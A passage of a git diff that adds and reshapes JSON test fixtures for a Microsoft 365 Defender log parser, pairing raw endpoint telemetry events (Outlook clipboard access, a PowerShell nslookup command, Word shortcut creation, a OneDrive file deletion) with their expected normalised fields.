office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "CommandLine": "\"OUTLOOK.EXE\" ", + "FileSize": 44152968, + "LogonId": "389220681", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Outlook", + "VersionInfoInternalFileName": "Outlook", + "VersionInfoOriginalFileName": "Outlook.exe", + "VersionInfoProductName": "Microsoft Outlook", + "VersionInfoProductVersion": "16.0.17928.20216" + } + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json new file mode 100644 index 000000000..ea0ddb0df --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json @@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "CommandLine": "powershell.exe", + "FileSize": 450560, + "LogonId": "398124703", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows PowerShell", + "VersionInfoInternalFileName": "POWERSHELL", + "VersionInfoOriginalFileName": "PowerShell.EXE", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.22621.3085" + } + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json new file mode 100644 index 000000000..37a646715 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "process": { + "parent": { + "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "FileSize": 1621656, + "LogonId": "8066492", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Word", + "VersionInfoInternalFileName": "WinWord", + "VersionInfoOriginalFileName": "WinWord.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.17928.20216" + } + } + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "name": "FILENAME.LNK", + "parent": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "start": "2024-11-06T16:05:23.113802Z", + "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json index 7428190cf..94b70858f 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json @@ -16,17 +16,19 @@ "@timestamp": "2022-09-01T07:46:42.468408Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", - "InitiatingProcessFileSize": 56824728, - "InitiatingProcessIntegrityLevel": "Medium", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", - "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe", - "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive", - "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", + "FileSize": 56824728, + "IntegrityLevel": "Medium", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", + "VersionInfoInternalFileName": "OneDriveSetup.exe", + "VersionInfoOriginalFileName": "OneDriveSetup.exe", + "VersionInfoProductName": "Microsoft OneDrive", + "VersionInfoProductVersion": "22.166.0807.0002" + } }, "type": "FileDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json new file mode 100644 index 000000000..1a9daafcd --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json @@ -0,0 +1,109 @@ +{ + 